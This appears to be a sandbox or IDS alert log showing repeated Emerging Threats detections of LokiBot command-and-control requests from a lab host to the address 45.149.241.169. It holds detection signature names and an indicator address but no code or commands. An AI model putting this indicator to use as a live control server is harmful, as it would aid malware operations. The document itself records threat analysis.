2024-10-03T09:22:21.208335+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64423	TCP
2024-10-03T09:22:22.053825+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64424	TCP
2024-10-03T09:22:23.004091+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64425	TCP
2024-10-03T09:22:23.936122+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64426	TCP
2024-10-03T09:22:24.754606+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64427	TCP
2024-10-03T09:22:25.644791+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64428	TCP
2024-10-03T09:22:26.484271+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64429	TCP
2024-10-03T09:22:27.336837+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64430	TCP
2024-10-03T09:22:28.161528+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64431	TCP
2024-10-03T09:22:29.297417+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64432	TCP
2024-10-03T09:22:30.485332+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64433	TCP
2024-10-03T09:22:31.491241+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64434	TCP
2024-10-03T09:22:32.311823+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64435	TCP
2024-10-03T09:22:33.193006+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64436	TCP
2024-10-03T09:22:35.085142+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64438	TCP
2024-10-03T09:22:35.853534+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64439	TCP
2024-10-03T09:22:36.755143+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64440	TCP
2024-10-03T09:22:37.782566+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64441	TCP
2024-10-03T09:22:38.692949+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64442	TCP
2024-10-03T09:22:39.530058+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64443	TCP
2024-10-03T09:22:40.355345+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64444	TCP
2024-10-03T09:22:41.357295+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64445	TCP
2024-10-03T09:22:42.192690+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64446	TCP
2024-10-03T09:22:43.095306+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64447	TCP
2024-10-03T09:22:43.915998+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64448	TCP
2024-10-03T09:22:44.845008+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.11	64449	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:51.444637+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	49713	45.149.241.169	80	TCP
2024-10-03T09:20:52.895647+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	49714	45.149.241.169	80	TCP
2024-10-03T09:20:55.154508+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	49715	45.149.241.169	80	TCP
2024-10-03T09:20:56.378201+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	49717	45.149.241.169	80	TCP
2024-10-03T09:20:57.546571+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	49718	45.149.241.169	80	TCP
2024-10-03T09:20:59.117485+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	55843	45.149.241.169	80	TCP
2024-10-03T09:21:00.355678+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64348	45.149.241.169	80	TCP
2024-10-03T09:21:01.453898+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64350	45.149.241.169	80	TCP
2024-10-03T09:21:02.292636+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64352	45.149.241.169	80	TCP
2024-10-03T09:21:03.191952+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64354	45.149.241.169	80	TCP
2024-10-03T09:21:04.262865+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64355	45.149.241.169	80	TCP
2024-10-03T09:21:05.200763+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64357	45.149.241.169	80	TCP
2024-10-03T09:21:06.209342+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64358	45.149.241.169	80	TCP
2024-10-03T09:21:07.095755+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64359	45.149.241.169	80	TCP
2024-10-03T09:21:08.058000+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64360	45.149.241.169	80	TCP
2024-10-03T09:21:08.908970+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64361	45.149.241.169	80	TCP
2024-10-03T09:21:09.839583+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64362	45.149.241.169	80	TCP
2024-10-03T09:21:10.836642+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64363	45.149.241.169	80	TCP
2024-10-03T09:21:11.918002+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64364	45.149.241.169	80	TCP
2024-10-03T09:21:12.880481+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64365	45.149.241.169	80	TCP
2024-10-03T09:21:13.766337+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64366	45.149.241.169	80	TCP
2024-10-03T09:21:14.575323+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64367	45.149.241.169	80	TCP
2024-10-03T09:21:15.899147+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64368	45.149.241.169	80	TCP
2024-10-03T09:21:16.915649+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64369	45.149.241.169	80	TCP
2024-10-03T09:21:17.866524+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64370	45.149.241.169	80	TCP
2024-10-03T09:21:19.008215+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64371	45.149.241.169	80	TCP
2024-10-03T09:21:21.428539+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64372	45.149.241.169	80	TCP
2024-10-03T09:21:22.234810+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64373	45.149.241.169	80	TCP
2024-10-03T09:21:23.090242+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64374	45.149.241.169	80	TCP
2024-10-03T09:21:23.948484+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64375	45.149.241.169	80	TCP
2024-10-03T09:21:24.875611+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64376	45.149.241.169	80	TCP
2024-10-03T09:21:25.669335+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64378	45.149.241.169	80	TCP
2024-10-03T09:21:26.688958+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64379	45.149.241.169	80	TCP
2024-10-03T09:21:27.634586+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64380	45.149.241.169	80	TCP
2024-10-03T09:21:28.548334+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64381	45.149.241.169	80	TCP
2024-10-03T09:21:29.432337+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64382	45.149.241.169	80	TCP
2024-10-03T09:21:30.259881+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64383	45.149.241.169	80	TCP
2024-10-03T09:21:31.213756+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64384	45.149.241.169	80	TCP
2024-10-03T09:21:32.591622+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64385	45.149.241.169	80	TCP
2024-10-03T09:21:33.386243+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64386	45.149.241.169	80	TCP
2024-10-03T09:21:35.070962+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64387	45.149.241.169	80	TCP
2024-10-03T09:21:46.491936+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64388	45.149.241.169	80	TCP
2024-10-03T09:21:47.323870+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64389	45.149.241.169	80	TCP
2024-10-03T09:21:48.281112+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64390	45.149.241.169	80	TCP
2024-10-03T09:21:49.089316+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64391	45.149.241.169	80	TCP
2024-10-03T09:21:50.342573+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64392	45.149.241.169	80	TCP
2024-10-03T09:21:51.138044+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64393	45.149.241.169	80	TCP
2024-10-03T09:21:51.987281+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64394	45.149.241.169	80	TCP
2024-10-03T09:21:52.824432+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64395	45.149.241.169	80	TCP
2024-10-03T09:21:53.813148+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64396	45.149.241.169	80	TCP
2024-10-03T09:21:54.779943+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64397	45.149.241.169	80	TCP
2024-10-03T09:21:55.743930+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64398	45.149.241.169	80	TCP
2024-10-03T09:21:57.049613+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64399	45.149.241.169	80	TCP
2024-10-03T09:21:58.009483+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64400	45.149.241.169	80	TCP
2024-10-03T09:21:58.968924+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64401	45.149.241.169	80	TCP
2024-10-03T09:21:59.912717+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64402	45.149.241.169	80	TCP
2024-10-03T09:22:00.875995+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64403	45.149.241.169	80	TCP
2024-10-03T09:22:02.986735+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64404	45.149.241.169	80	TCP
2024-10-03T09:22:03.927136+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64405	45.149.241.169	80	TCP
2024-10-03T09:22:04.921954+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64406	45.149.241.169	80	TCP
2024-10-03T09:22:06.114484+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64407	45.149.241.169	80	TCP
2024-10-03T09:22:07.060441+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64408	45.149.241.169	80	TCP
2024-10-03T09:22:07.996431+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64409	45.149.241.169	80	TCP
2024-10-03T09:22:09.068231+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64410	45.149.241.169	80	TCP
2024-10-03T09:22:10.004080+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64411	45.149.241.169	80	TCP
2024-10-03T09:22:11.079290+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64412	45.149.241.169	80	TCP
2024-10-03T09:22:12.003792+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64413	45.149.241.169	80	TCP
2024-10-03T09:22:12.893575+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64414	45.149.241.169	80	TCP
2024-10-03T09:22:13.853371+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64415	45.149.241.169	80	TCP
2024-10-03T09:22:14.776328+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64416	45.149.241.169	80	TCP
2024-10-03T09:22:15.764134+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64417	45.149.241.169	80	TCP
2024-10-03T09:22:16.667875+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64418	45.149.241.169	80	TCP
2024-10-03T09:22:17.525911+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64419	45.149.241.169	80	TCP
2024-10-03T09:22:18.555021+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64420	45.149.241.169	80	TCP
2024-10-03T09:22:19.379297+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64421	45.149.241.169	80	TCP
2024-10-03T09:22:20.358626+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64422	45.149.241.169	80	TCP
2024-10-03T09:22:21.203422+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64423	45.149.241.169	80	TCP
2024-10-03T09:22:22.048862+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64424	45.149.241.169	80	TCP
2024-10-03T09:22:22.910892+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64425	45.149.241.169	80	TCP
2024-10-03T09:22:23.931318+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64426	45.149.241.169	80	TCP
2024-10-03T09:22:24.748653+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64427	45.149.241.169	80	TCP
2024-10-03T09:22:25.639024+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64428	45.149.241.169	80	TCP
2024-10-03T09:22:26.473248+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64429	45.149.241.169	80	TCP
2024-10-03T09:22:27.331889+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64430	45.149.241.169	80	TCP
2024-10-03T09:22:28.156424+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64431	45.149.241.169	80	TCP
2024-10-03T09:22:29.195837+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64432	45.149.241.169	80	TCP
2024-10-03T09:22:30.480234+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64433	45.149.241.169	80	TCP
2024-10-03T09:22:31.486447+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64434	45.149.241.169	80	TCP
2024-10-03T09:22:32.303507+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64435	45.149.241.169	80	TCP
2024-10-03T09:22:33.188157+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64436	45.149.241.169	80	TCP
2024-10-03T09:22:34.292855+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64437	45.149.241.169	80	TCP
2024-10-03T09:22:35.079411+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64438	45.149.241.169	80	TCP
2024-10-03T09:22:35.848697+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64439	45.149.241.169	80	TCP
2024-10-03T09:22:36.750157+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64440	45.149.241.169	80	TCP
2024-10-03T09:22:37.777548+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64441	45.149.241.169	80	TCP
2024-10-03T09:22:38.687921+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64442	45.149.241.169	80	TCP
2024-10-03T09:22:39.523859+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64443	45.149.241.169	80	TCP
2024-10-03T09:22:40.350489+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64444	45.149.241.169	80	TCP
2024-10-03T09:22:41.352352+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64445	45.149.241.169	80	TCP
2024-10-03T09:22:42.187830+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64446	45.149.241.169	80	TCP
2024-10-03T09:22:43.088359+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64447	45.149.241.169	80	TCP
2024-10-03T09:22:43.911035+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64448	45.149.241.169	80	TCP
2024-10-03T09:22:44.840138+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.11	64449	45.149.241.169	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:51.444637+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	49713	45.149.241.169	80	TCP
2024-10-03T09:20:52.895647+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	49714	45.149.241.169	80	TCP
2024-10-03T09:20:55.154508+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	49715	45.149.241.169	80	TCP
2024-10-03T09:20:56.378201+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	49717	45.149.241.169	80	TCP
2024-10-03T09:20:57.546571+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	49718	45.149.241.169	80	TCP
2024-10-03T09:20:59.117485+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	55843	45.149.241.169	80	TCP
2024-10-03T09:21:00.355678+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64348	45.149.241.169	80	TCP
2024-10-03T09:21:01.453898+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64350	45.149.241.169	80	TCP
2024-10-03T09:21:02.292636+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64352	45.149.241.169	80	TCP
2024-10-03T09:21:03.191952+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64354	45.149.241.169	80	TCP
2024-10-03T09:21:04.262865+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64355	45.149.241.169	80	TCP
2024-10-03T09:21:05.200763+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64357	45.149.241.169	80	TCP
2024-10-03T09:21:06.209342+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64358	45.149.241.169	80	TCP
2024-10-03T09:21:07.095755+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64359	45.149.241.169	80	TCP
2024-10-03T09:21:08.058000+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64360	45.149.241.169	80	TCP
2024-10-03T09:21:08.908970+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64361	45.149.241.169	80	TCP
2024-10-03T09:21:09.839583+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64362	45.149.241.169	80	TCP
2024-10-03T09:21:10.836642+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64363	45.149.241.169	80	TCP
2024-10-03T09:21:11.918002+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64364	45.149.241.169	80	TCP
2024-10-03T09:21:12.880481+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64365	45.149.241.169	80	TCP
2024-10-03T09:21:13.766337+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64366	45.149.241.169	80	TCP
2024-10-03T09:21:14.575323+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64367	45.149.241.169	80	TCP
2024-10-03T09:21:15.899147+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64368	45.149.241.169	80	TCP
2024-10-03T09:21:16.915649+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64369	45.149.241.169	80	TCP
2024-10-03T09:21:17.866524+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64370	45.149.241.169	80	TCP
2024-10-03T09:21:19.008215+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64371	45.149.241.169	80	TCP
2024-10-03T09:21:21.428539+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64372	45.149.241.169	80	TCP
2024-10-03T09:21:22.234810+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64373	45.149.241.169	80	TCP
2024-10-03T09:21:23.090242+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64374	45.149.241.169	80	TCP
2024-10-03T09:21:23.948484+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64375	45.149.241.169	80	TCP
2024-10-03T09:21:24.875611+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64376	45.149.241.169	80	TCP
2024-10-03T09:21:25.669335+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64378	45.149.241.169	80	TCP
2024-10-03T09:21:26.688958+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64379	45.149.241.169	80	TCP
2024-10-03T09:21:27.634586+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64380	45.149.241.169	80	TCP
2024-10-03T09:21:28.548334+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64381	45.149.241.169	80	TCP
2024-10-03T09:21:29.432337+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64382	45.149.241.169	80	TCP
2024-10-03T09:21:30.259881+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64383	45.149.241.169	80	TCP
2024-10-03T09:21:31.213756+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64384	45.149.241.169	80	TCP
2024-10-03T09:21:32.591622+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64385	45.149.241.169	80	TCP
2024-10-03T09:21:33.386243+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64386	45.149.241.169	80	TCP
2024-10-03T09:21:35.070962+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64387	45.149.241.169	80	TCP
2024-10-03T09:21:46.491936+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64388	45.149.241.169	80	TCP
2024-10-03T09:21:47.323870+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64389	45.149.241.169	80	TCP
2024-10-03T09:21:48.281112+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64390	45.149.241.169	80	TCP
2024-10-03T09:21:49.089316+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64391	45.149.241.169	80	TCP
2024-10-03T09:21:50.342573+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64392	45.149.241.169	80	TCP
2024-10-03T09:21:51.138044+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64393	45.149.241.169	80	TCP
2024-10-03T09:21:51.987281+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64394	45.149.241.169	80	TCP
2024-10-03T09:21:52.824432+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64395	45.149.241.169	80	TCP
2024-10-03T09:21:53.813148+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64396	45.149.241.169	80	TCP
2024-10-03T09:21:54.779943+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64397	45.149.241.169	80	TCP
2024-10-03T09:21:55.743930+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64398	45.149.241.169	80	TCP
2024-10-03T09:21:57.049613+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64399	45.149.241.169	80	TCP
2024-10-03T09:21:58.009483+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64400	45.149.241.169	80	TCP
2024-10-03T09:21:58.968924+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64401	45.149.241.169	80	TCP
2024-10-03T09:21:59.912717+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64402	45.149.241.169	80	TCP
2024-10-03T09:22:00.875995+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64403	45.149.241.169	80	TCP
2024-10-03T09:22:02.986735+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64404	45.149.241.169	80	TCP
2024-10-03T09:22:03.927136+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64405	45.149.241.169	80	TCP
2024-10-03T09:22:04.921954+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64406	45.149.241.169	80	TCP
2024-10-03T09:22:06.114484+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64407	45.149.241.169	80	TCP
2024-10-03T09:22:07.060441+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64408	45.149.241.169	80	TCP
2024-10-03T09:22:07.996431+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64409	45.149.241.169	80	TCP
2024-10-03T09:22:09.068231+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64410	45.149.241.169	80	TCP
2024-10-03T09:22:10.004080+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64411	45.149.241.169	80	TCP
2024-10-03T09:22:11.079290+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64412	45.149.241.169	80	TCP
2024-10-03T09:22:12.003792+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64413	45.149.241.169	80	TCP
2024-10-03T09:22:12.893575+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64414	45.149.241.169	80	TCP
2024-10-03T09:22:13.853371+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64415	45.149.241.169	80	TCP
2024-10-03T09:22:14.776328+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64416	45.149.241.169	80	TCP
2024-10-03T09:22:15.764134+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64417	45.149.241.169	80	TCP
2024-10-03T09:22:16.667875+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64418	45.149.241.169	80	TCP
2024-10-03T09:22:17.525911+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64419	45.149.241.169	80	TCP
2024-10-03T09:22:18.555021+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64420	45.149.241.169	80	TCP
2024-10-03T09:22:19.379297+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64421	45.149.241.169	80	TCP
2024-10-03T09:22:20.358626+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64422	45.149.241.169	80	TCP
2024-10-03T09:22:21.203422+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64423	45.149.241.169	80	TCP
2024-10-03T09:22:22.048862+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64424	45.149.241.169	80	TCP
2024-10-03T09:22:22.910892+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64425	45.149.241.169	80	TCP
2024-10-03T09:22:23.931318+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64426	45.149.241.169	80	TCP
2024-10-03T09:22:24.748653+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64427	45.149.241.169	80	TCP
2024-10-03T09:22:25.639024+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64428	45.149.241.169	80	TCP
2024-10-03T09:22:26.473248+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64429	45.149.241.169	80	TCP
2024-10-03T09:22:27.331889+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64430	45.149.241.169	80	TCP
2024-10-03T09:22:28.156424+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64431	45.149.241.169	80	TCP
2024-10-03T09:22:29.195837+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64432	45.149.241.169	80	TCP
2024-10-03T09:22:30.480234+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64433	45.149.241.169	80	TCP
2024-10-03T09:22:31.486447+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64434	45.149.241.169	80	TCP
2024-10-03T09:22:32.303507+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64435	45.149.241.169	80	TCP
2024-10-03T09:22:33.188157+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64436	45.149.241.169	80	TCP
2024-10-03T09:22:34.292855+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64437	45.149.241.169	80	TCP
2024-10-03T09:22:35.079411+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64438	45.149.241.169	80	TCP
2024-10-03T09:22:35.848697+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64439	45.149.241.169	80	TCP
2024-10-03T09:22:36.750157+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64440	45.149.241.169	80	TCP
2024-10-03T09:22:37.777548+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64441	45.149.241.169	80	TCP
2024-10-03T09:22:38.687921+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64442	45.149.241.169	80	TCP
2024-10-03T09:22:39.523859+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64443	45.149.241.169	80	TCP
2024-10-03T09:22:40.350489+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64444	45.149.241.169	80	TCP
2024-10-03T09:22:41.352352+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64445	45.149.241.169	80	TCP
2024-10-03T09:22:42.187830+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64446	45.149.241.169	80	TCP
2024-10-03T09:22:43.088359+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.11	64447	45.149.241.169	80	TCP
